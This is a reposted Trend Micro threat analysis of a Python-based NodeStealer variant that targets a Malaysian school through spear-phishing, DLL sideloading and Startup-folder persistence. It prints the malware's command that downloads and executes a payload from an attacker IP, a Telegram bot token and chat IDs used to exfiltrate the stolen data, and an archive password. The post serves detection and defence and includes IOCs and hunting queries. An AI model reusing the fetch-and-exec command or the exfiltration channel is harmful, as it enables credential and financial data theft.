{"id":57888,"date":"2024-12-19T00:00:00","date_gmt":"2024-12-19T00:00:00","guid":{"rendered":"urn:uuid:6d380b53-30d1-17da-2558-a878f0b619e3"},"modified":"2024-12-19T00:00:00","modified_gmt":"2024-12-19T00:00:00","slug":"python-based-nodestealer-version-targets-facebook-ads-manager","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","title":{"rendered":"Python-Based NodeStealer Version Targets Facebook Ads Manager"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80\"> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.0293231425\"> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"123975887\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"11.278846153846\">\n<div
class=\"article-details\" role=\"heading\" readability=\"42.173076923077\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Malware<\/p>\n<p class=\"article-details__description\">In this blog entry, Trend Micro\u2019s Managed XDR team discuss their investigation into how the latest variant of NodeStealer is delivered through spear-phishing attacks, potentially leading to malware execution, data theft, and the exfiltration of sensitive information via Telegram.<\/p>\n<p class=\"article-details__author-by\">By: Aira Marcelo, Bren Matthew Ebriega, Abdul Rahim <time class=\"article-details__date\">December 19, 2024<\/time> <\/p>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"46.587719298246\">\n<div readability=\"38.657894736842\">\n<h4>Summary<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">The NodeStealer malware has advanced from a JavaScript-based to a Python-based threat, enabling it to steal a broader range of sensitive data.<\/span><\/li>\n<li><span
class=\"rte-red-bullet\">Trend Micro\u2019s MXDR team identified this updated NodeStealer variant in a malware campaign targeting an educational institution in Malaysia, linked to a Vietnamese threat group.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">This latest version of NodeStealer not only harvests credit card details and browser-stored data, but also targets Facebook Ads Manager accounts for their critical financial and business information.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The infection chain starts with a spear-phishing email with a malicious embedded link, which upon clicking, downloads and installs the malware under the guise of a legitimate application.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The malware uses sophisticated techniques, such as DLL sideloading and encoded PowerShell commands, to bypass security defenses and execute the final payload, exfiltrating data through Telegram.<\/span><\/li>\n<\/ul>\n<p>The updated version of NodeStealer, initially identified in 2023 as <a href=\"https:\/\/engineering.fb.com\/2023\/05\/03\/security\/malware-nodestealer-ducktail\/\" target=\"_blank\" rel=\"noopener\">a JavaScript-based malware<\/a>, has significantly evolved into a more sophisticated Python-based threat that\u2019s able to extract a broader range of sensitive data from victims: This advanced variant of NodeStealer not only harvests credit card details and browser-stored information, but also targets Facebook Ads Manager accounts, siphoning critical financial and business data.
Facebook Ads Manager, widely used by businesses and individuals to create, manage, and analyze advertising campaigns across various platforms including Facebook, Instagram, Messenger, and the Audience Network, has become a prime target for cybercriminals seeking to exploit sensitive personal and business-related information.<\/p>\n<p>A recent investigation by Trend Micro\u2019s Managed Extended Detection and Response (MXDR) team uncovered the presence of this updated NodeStealer variant in a malware campaign, underscoring its evolving techniques and the increased sophistication of modern cyber threats. Our analysis identified that the Malaysian victim was from the education sector. The campaign appears to have originated from a Vietnamese threat group, as suggested by the password that was used to compress the malicious files. The spear-phishing email carrying the malware was written in Bahasa Melayu to target Malay-speaking victims. However, the awkward wording of the email message\u2019s subject line, which appeared to be machine-translated from English, raised the MXDR team&#8217;s suspicions during their investigation.<\/p>\n<h4>Technical details<\/h4>\n<p>The infection began with a spear-phishing email sent from a suspicious Gmail address, targeting multiple users within the organization (Figure 1). The email contained an embedded link that lured recipients into believing it was a link to a PDF file. Once clicked, it downloads the malicious file: a seemingly harmless PDF that\u2019s designed to exploit vulnerabilities in the users&#8217; devices, allowing attackers to install malware and steal sensitive information.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig1.png\" alt=\"Figure 1.
Infection chain\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. Infection chain<\/figcaption><\/div>\n<\/figure><\/div>\n<div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The attacker deceives the user by sending a fake copyright infringement notice (Figure 2). This tactic pressures the recipient into taking immediate action without carefully considering the message, often leading them to click on malicious links or download harmful files. The fraudulent notice is crafted to appear as though it&#8217;s from a legitimate authority.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig02.png\" alt=\"Figure 2. Email sample with the malicious embedded link (Translation: \u201cNotice of infringement of intellectual property rights\u201d)\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. Email sample with the malicious embedded link (Translation: \u201cNotice of infringement of intellectual property rights\u201d)<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>Once the user clicks on the embedded malicious link in the email, it triggers the download of a suspicious file named <i>Nombor Rekod 052881.zip<\/i>. Upon extracting the contents of the zip file, the user inadvertently unleashes several suspicious files onto the system. 
These dropped files are as follows:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">D:\\&lt;USER&gt;\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\GHelper.dll<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\&lt;USER&gt;\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\Nombor Rekod 052881.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\&lt;USER&gt;\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\hpreaderfprefs.dat<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\&lt;USER&gt;\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\oledlg.dll<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\&lt;USER&gt;\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\images\\active-license.bat<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\&lt;USER&gt;\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\images\\license-key.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\&lt;USER&gt;\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\images\\license.rar<\/span><\/li>\n<\/ul>\n<p>The executable file <i>Nombor Rekod 052881.exe<\/i>, which appears to be a PDF reader \u2013 normally recognized as a trusted application \u2013 was observed being exploited to sideload the malicious DLL file <i>oledlg.dll<\/i> (Figure 3). As a result, the malware is able to execute its malicious actions under the guise of a legitimate program, enabling it to bypass security defenses and perform its attack unnoticed.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig03.png\" alt=\"Figure 3. Evidence of DLL side-loading from telemetry data\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3.
Evidence of DLL side-loading from telemetry data<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>As shown in Figure 4, the sideloaded DLL then executes a batch file, <i>images\\active-license.bat<\/i>, using the command prompt (cmd.exe).<\/p>\n<p><span class=\"blockquote\">C:\\Windows\\system32\\cmd.exe \/c start \/min images\\active-license.bat -&gt; C:\\Windows\\system32\\cmd.exe&nbsp; \/K images\\active-license.bat<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig04.png\" alt=\"Figure 4. Process chain of DLL sideloading\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. Process chain of DLL sideloading<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>This batch file <i>images\\active-license.bat<\/i> contains a malicious encoded command which then executes the PowerShell shown in Figure 5:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig05.png\" alt=\"Figure 5. Malicious encoded PowerShell execution\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Malicious encoded PowerShell execution<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"41\">\n<div readability=\"27\">\n<p>The PowerShell command performs the following actions:<\/p>\n<p><b>1. Hides the console window<\/b><\/p>\n<p><b>2. Force creates the folder %LocalAppData%\\ChromeApplication<\/b><\/p>\n<p><b>3. 
Unarchives the license.rar file (using license.exe) to %LocalAppData%\\ChromeApplication<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">images\\license-key.exe&nbsp;(SHA256: 0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118)<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Original Filename: Rar.exe (WinRAR 7.1.0)<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Command line RAR<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Used to unarchive license.rar<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\">images\\license.rar&nbsp;(SHA256: ed1c48542a3e58020bd624c592f6aa7f7868ee16fbb03308269d44c4108011b1)<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">The archive is password protected (pw:Kimsexy@hacking.vn).<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Password can be obtained from the deobfuscated PowerShell command.<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Contains a portable Python 3.10 interpreter that will download and execute the final payload.<\/span>\n<ul>\n<li><span class=\"rte-square-bullet\">synaptics.exe &#8211; Original Filename: pythonw.exe (python cli interpreter)<\/span><\/li>\n<li><span class=\"rte-square-bullet\">vcruntime140.dll<\/span><\/li>\n<li><span class=\"rte-square-bullet\">python3.10.dll<\/span><\/li>\n<li><span class=\"rte-square-bullet\">Other folders<\/span>\n<ul>\n<li><span class=\"rte-red-chevron\">C:\\Users\\&lt;USERNAME&gt;\\AppData\\Local\\ChromeApplication\\DLLs\\**<\/span><\/li>\n<li><span class=\"rte-red-chevron\">C:\\Users\\&lt;USERNAME&gt;\\AppData\\Local\\ChromeApplication\\DLLs\\**<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><b>4. Downloads and executes this decoy PDF file located at %User Profile%\\document.pdf:<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">&#8220;C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe&#8221; &#8220;C:\\Users\\ainanadiaz\\document.pdf&#8221;<\/span><\/li>\n<\/ul>\n<p><b>5. 
Ensures persistence through the startup-folder by:<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Creating the file WindowsSecurity.lnk<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Storing the file in %Application Data%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<\/span><\/li>\n<\/ul>\n<p><b>6. Downloads (in-memory) and executes the final payload via command:<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">cmd \/C start &#8220;&#8221; &#8220;%LOCALAPPDATA%\\ChromeApplication\\synaptics.exe&#8221; -c &#8220;import requests;exec(requests.get(&#8216; http[:\/\/]88.216.99.5:15707\/entry.txt&#8217;), verify=False).text)<\/span><\/li>\n<\/ul>\n<p>The malware attempts to connect to the URL http[:\/\/]88.216.99.5:15707\/entry.txt to download and execute (in-memory) its final payload.<\/p>\n<p>The file&nbsp;<i>entry.txt<\/i>&nbsp;contains an obfuscated Python script, shown below in Figure 6. The script uses the combination of native Python commands <i>exec()<\/i> and <i>marshal.loads()<\/i> to execute Python bytecode directly.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig06.png\" alt=\"Figure 6. Python script to execute Python bytecode directly\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. Python script to execute Python bytecode directly<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The disassembly of the bytecode shown in Figure 7 is used to decrypt another binary string using the function <i>hybrid_decrypt<\/i>. The output of said function is stored in the variable <i>code<\/i>. 
The variable is then passed to the function <i>runner<\/i> to execute the decrypted bytecode.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig07.png\" alt=\"Figure 7. Disassembled Python bytecode\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. Disassembled Python bytecode<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Disassembling the bytecode from the variable <i>code<\/i> shows that the intended final payload is an infostealer designed to harvest credit card data and sensitive information stored in web browsers (Figure 8).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig08.png\" alt=\"Figure 8. An infostealer as the final payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. An infostealer as the final payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>In addition to harvesting data, this new campaign also targets Facebook Ads Manager accounts, extracting financial and business-related information to drive malicious advertising campaigns (Figure 9).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig09.png\" alt=\"Figure 9. Targeting Facebook Ads Manager accounts\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. 
Targeting Facebook Ads Manager accounts<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>It was observed that data exfiltration is carried out through Telegram, where the stolen sensitive information is first compiled into a zip archive. This archived data is then sent to a specific Telegram link. The use of Telegram as a medium for transferring the stolen data ensures a covert and efficient method for cybercriminals to exfiltrate sensitive information.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">https[:\/\/]api[.]telegram[.]org\/bot7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI\/sendDocument<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The chat-id parameter used can be \u2018-1002426006531\u2019 or \u2018-1002489276039\u2019.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"39.5\">\n<div readability=\"24\">\n<h4>Conclusion and recommendations<\/h4>\n<p>The newest NodeStealer variant demonstrates a more sophisticated approach to data theft: It specifically targets Facebook Ads Manager accounts, credit card information, and confidential data stored in web browsers, using increasingly sophisticated methods to bypass detection. This updated version emphasizes the need for heightened awareness and robust cybersecurity measures to defend against threats like NodeStealer.<\/p>\n<p>To safeguard against such threats, the following steps are highly recommended:<\/p>\n<ol>\n<li>Exercise caution with suspicious emails. <span>Always be skeptical of emails from unknown or untrusted sources. Be particularly wary of emails that contain embedded links, as these may lead to phishing sites designed to steal personal information or prompt the automatic download of malicious software, including infostealers like NodeStealer. 
Users should never click on links or download attachments from unfamiliar senders.<\/span><\/li>\n<li><b>Educate users to recognize threats.<\/b> <span>A key component of any strong cybersecurity defense is training. It is essential to educate users on how to identify the telltale signs of phishing attacks, suspicious emails, and potentially harmful links. Awareness of common social engineering tactics, such as fraudulent email requests or deceptive website URLs, can help users make informed decisions and avoid falling victim to cyber threats.<\/span><\/li>\n<li><b>Regularly scan for malware and keep antivirus software updated.<\/b> <span>Regularly scanning systems for malware and ensuring that antivirus software is up to date with the latest virus definitions is critical in defending against threats like NodeStealer. Cybercriminals are constantly evolving their tactics, so it\u2019s vital that security tools are always equipped to recognize and block the most recent threats. Make sure your system is regularly checked for infections and that antivirus software automatically installs updates to keep pace with new malware variants.<\/span><\/li>\n<\/ol>\n<p>By adopting these practices, individuals and organizations can significantly strengthen their defenses against sophisticated malware such as NodeStealer. Proactive steps\u2014such as cautious email habits, user education, and regular system maintenance\u2014are essential in building a comprehensive cybersecurity strategy that helps mitigate the risk of data breaches and other malicious activities.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"40.397473997028\">\n<div readability=\"29.717682020802\">\n<h4>Trend Micro Vision One Threat Intelligence<\/h4>\n<p>To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. 
Threat Insights helps customers stay ahead of cyber threats before they happen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.<\/p>\n<p><b>Trend Micro Vision One Intelligence Reports App [IOC Sweeping]<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">NodeStealer 2.0 \u2013 The Python Version: Stealing Facebook Business Accounts<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Python-Based NodeStealer Version Targets Facebook Ads Manager<\/span><\/li>\n<\/ul>\n<p><b>Trend Micro Vision One Threat Insights App<\/b><\/p>\n<h4>Hunting Queries<\/h4>\n<p><b>Trend Micro Vision One Search App<\/b><\/p>\n<p>Trend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.<\/p>\n<p><i>Detection of Malware Components of the Attack<\/i><\/p>\n<p><span class=\"blockquote\">malName:(*RASPBERRYROBIN* OR *NODESTEALER*) AND eventName:MALWARE_DETECTION<\/span><\/p>\n<p>More hunting queries are available for Vision One customers with <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform\/threat-insights.html\" target=\"_blank\" rel=\"noopener\">Threat Insights Entitlement enabled<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<h4>Indicators of Compromise (IOCs)<\/h4>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"11\">\n<tr>\n<td width=\"154\" valign=\"top\"><b>Indicator<\/b><\/td>\n<td width=\"236\" valign=\"top\"><b>SHA256<\/b><\/td>\n<td width=\"117\" valign=\"top\"><b>Description<\/b><\/td>\n<td width=\"117\" valign=\"top\"><b>Detection<\/b><\/td>\n<\/tr>\n<tr
readability=\"4\">\n<td width=\"154\" valign=\"top\">oledlg.dll<\/td>\n<td width=\"236\" valign=\"top\">f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71<\/td>\n<td width=\"117\" valign=\"top\">Sideloaded DLL<\/td>\n<td width=\"117\" valign=\"top\">Trojan.Win32.RASPBERRYROBIN.HA<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"154\" valign=\"top\">active-license.bat<\/td>\n<td width=\"236\" valign=\"top\">1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66<\/td>\n<td width=\"117\" valign=\"top\">Executes the PowerShell command<\/td>\n<td width=\"117\" valign=\"top\">HackTool.BAT.HideConsole.A<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"154\" valign=\"top\">WindowsSecurity.lnk<\/td>\n<td width=\"236\" valign=\"top\">786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458<\/td>\n<td width=\"117\" valign=\"top\">Created persistence<\/td>\n<td width=\"117\" valign=\"top\">Trojan.LNK.DOWNLOADER.D<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"154\" valign=\"top\">hxxps:\/\/t[.]ly\/MRAbJ<\/td>\n<td width=\"236\" valign=\"top\">&nbsp;<\/td>\n<td width=\"117\" valign=\"top\">Malicious download link<\/td>\n<td width=\"117\" valign=\"top\">Dangerous \u2013 Disease Vector<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"154\" valign=\"top\">hxxp:\/\/88[.]216[.]99[.]5:15707\/entry[.]txt<\/td>\n<td width=\"236\" valign=\"top\">&nbsp;<\/td>\n<td width=\"117\" valign=\"top\">&nbsp;<\/td>\n<td width=\"117\" valign=\"top\">Dangerous \u2013 Malware Accomplice<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center> <\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body>
Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/l\/python-based-nodestealer.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, Trend Micro\u2019s Managed XDR team discuss their investigation into how the latest variant of NodeStealer is delivered through spear-phishing attacks, potentially leading to malware execution, data theft, and the exfiltration of sensitive information via Telegram. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9513,9509],"class_list":["post-57888","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-malware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-19T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Python-Based NodeStealer Version Targets Facebook Ads Manager\",\"datePublished\":\"2024-12-19T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\"},\"wordCount\":1943,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/NodeStealer-thumbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\",\"name\":\"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity 
News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/NodeStealer-thumbnail:Large?qlt=80\",\"datePublished\":\"2024-12-19T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/NodeStealer-thumbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/NodeStealer-thumbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, 
